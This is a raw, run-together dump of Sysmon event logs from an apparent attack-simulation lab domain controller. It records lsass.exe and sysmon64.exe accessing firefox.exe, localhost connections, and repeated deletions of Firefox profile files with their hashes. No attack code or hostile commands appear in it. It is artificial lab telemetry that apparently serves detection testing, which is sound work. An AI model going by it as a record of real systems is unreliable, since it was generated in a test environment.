Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000043606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.112{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcpfalsefalse127.0.0.1-56342-false127.0.0.1-56341- 10341000x800000000000000043605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-DA03-63C7-2000-00000000AF02}2452800C:\Windows\sysmon64.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1d018|C:\Windows\System32\KERNEL32.DLL+25aa7|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-DA03-63C7-2000-00000000AF02}2452800C:\Windows\sysmon64.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000043601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.112{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse127.0.0.1-56342-false127.0.0.1-56341- 17141700x800000000000000043600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.764{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.4.143064469C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-DA03-63C7-2000-00000000AF02}2452800C:\Windows\sysmon64.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1d018|C:\Windows\System32\KERNEL32.DLL+25aa7|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-DA03-63C7-2000-00000000AF02}2452800C:\Windows\sysmon64.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.726{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=390B04E97F732855F9B43EDEC53A5384,SHA256=D2F92281FB1C83C33897FBE759619D41FA1DC16C3FBA8FE2E50AF6292837119B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.726{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=47A85B5BC4499FF2D6F9664B3BD59431,SHA256=1390F2FC6ADA69663E2B19C05716FA21CF92D5E6EC949B3AC4DF864BD0669A9D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.726{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=024A4767B8427974CAE410A525C9AD5F,SHA256=B79AB240E3A34952C64546068E29468379237195FF45BB01982C9F159469E1EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.726{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=E7F61E515DE8B653D1EBD158029883B4,SHA256=892529AF8D5778A3CC89F92B6E2C2E2DAF285E6FB9F1650E35B95B7A51642AA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.726{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=2E78099C054F7E9D3D85AF8A892D84C8,SHA256=630A9C549CC3A2A5AB7FBFB638177AD69ACEE55C583B9343308C75489C02BDA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.726{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=45D8F7CF88C66456E5C8924A6B1A4FE7,SHA256=E75EB0626DEB49814660DEE631EB4E88FF49D23FB7C49CB970D33F6277C28D80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.726{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=2E78099C054F7E9D3D85AF8A892D84C8,SHA256=630A9C549CC3A2A5AB7FBFB638177AD69ACEE55C583B9343308C75489C02BDA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F5D33E712B9ABEFDE54B851D9A535858,SHA256=62FC7F449D80FD1C595122F71E82276B603081E9879DD4510FB03E9727D004FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=60C72FC652E153A0E4937FE4AF115957,SHA256=4A180CB22F1C7E81FB606AEC38F4D8DA46E1F5D48657B7B8298BCD4FE05EF313,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=88B212269917C7C2A245DB348386FF54,SHA256=B629AA4546E5379F1D988ADB77C1FD81153407312BD26A52C1EA492414291D36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=6D3748FA48AEFF90F5C95AF86AFE711F,SHA256=3DA5CE7A6A2E7D8A2BF43174D600BB83179DD9AF6FF533835D5D3ADEB5681655,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=339EC79BC1F02246D5A94F04CE1C7BD9,SHA256=DE99A374FD11EE6912E2B9776E7B430506A3F052EC2B5CC994E4796625C65EE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F3518FA07CCF2E93DA47B832E130C0F0,SHA256=4DD44C8DBB12C0752BB87DE60712A7A3FEA8CDC0ECCB05D4094AF904056F6D94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=2C470BBE08962383E8261DC7D5AB6C4F,SHA256=C6881A75845870A9DC0CB5EE7B4A863116CDEA783B79EA3BE54067C31ECED0C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=6B4E05C625A467826599EC9D6FD2787A,SHA256=1F8B25D90B43A942B142145EDBE1A6E31DA5F617B945330685EEA0CEF3B0FF70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=821481E03A37B250E33BC1DA3EDBE452,SHA256=950187D8FC12B156235AB5C71097AE1789CCB7170880AEB9DBB05FC6F1624D9D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=AD1A7CF5C228F43734491E99539A871C,SHA256=627A16DF3FE2F434B8EF224B6EDF55F9D69B15D17E9BFC47F691008D9F12A1FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F0C0AD778BEA151ABD39C11E414C9407,SHA256=D1A51810E096DF1A0885E22661E41DD2246A48CF7C878E12726B6C1349EE85ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=CB5410DCC96CBB6B6B05A8A7F91FD2BB,SHA256=74BE682CB2B49FF455B617B9ED732220695CF28CF5ED5542F1189E084EFB904C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A3DB650AE6228F4CA2C444C3FA64298C,SHA256=43022CAECCF2A57127E80090C40BDD196B2E477B59772EFD71CE6DF7CA72A4C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=7E2804549A95A5B58C946676723616A7,SHA256=41C4ECC90169BC7C6D165A7474E27AA64AD7FE815FAE8EE2C0512EB04C2E81EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=3BDF88750CA7A6B53510CC1D5C937301,SHA256=7D3CFBCBC050537DACAD6C8799384478F99D5D52125E4CBDD6592903AE4AFA67,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=E95BDA8DC78B9CB73FDFABAE10667955,SHA256=0770CA918E29B383D321C311E9C54B44367139944A751C8E57A6D6EBABA8814B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.710{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=200BF074DC271E87ADABAEBE796E7702,SHA256=3225D806AAB8A40EF703194CE935187758D47CE4E843AD218957E3A21C2F29FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=D0F891E47BA1A2894635953F46619AAD,SHA256=9A27E8AEF76C3A72FA8D3FCFE88A6A3EE22E436A0D437A149DB8967578B6E799,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=3E325E679500DFC66FD5C8DD404C3AE8,SHA256=6755E623D13B488B5A2762641B33C1E48BB426F62CA4AF2357FB385573772AEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=DEFC9BCDD60D569E50380E064421E9A5,SHA256=C80B3DDD1DD574C0B1190CF379FBFABFCA225C9E1BD906F5ADF4AD0401572A1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B8F344034742B8B83C30CF97FE40EDFE,SHA256=E0B0F1E91ED581162C6D8DB255000081E29ED6CE246463935DC3509A84428372,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\protections.sqlite-journalMD5=46741D1DE93A0A3C41453BC8E9990CCD,SHA256=7BB81A3C2BCB618AD87D833CF3E670848C9E840B9B6EF5CECB3C8F94DECB5E8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F073515736A98972B48EA51AFBC5AD6F,SHA256=EC235152850CD3FB6EBCD6625DA4757A731ED5C2E0C673C8ADF1AF48E2B9B0BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=D3EE5345E3EF5A87E488589BAD4F790F,SHA256=C0D5166713E0480CA33BF7DF7D033CB70F4E77DFC10C41852E77FA269698FFF8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B413A2CA7623C6E6B1C760AB6BCD680F,SHA256=19BE6943899889F9E0596057D22BE0B82DEA3CEF79A7CB51FF0CB160EFF28159,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1DBB08801EC3DC2EDBC3262BC82EE4B2,SHA256=F3E322B472C4F13EB697AC52D37C2E1E7EAEFC91396A58896C927FD07CFBC4AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 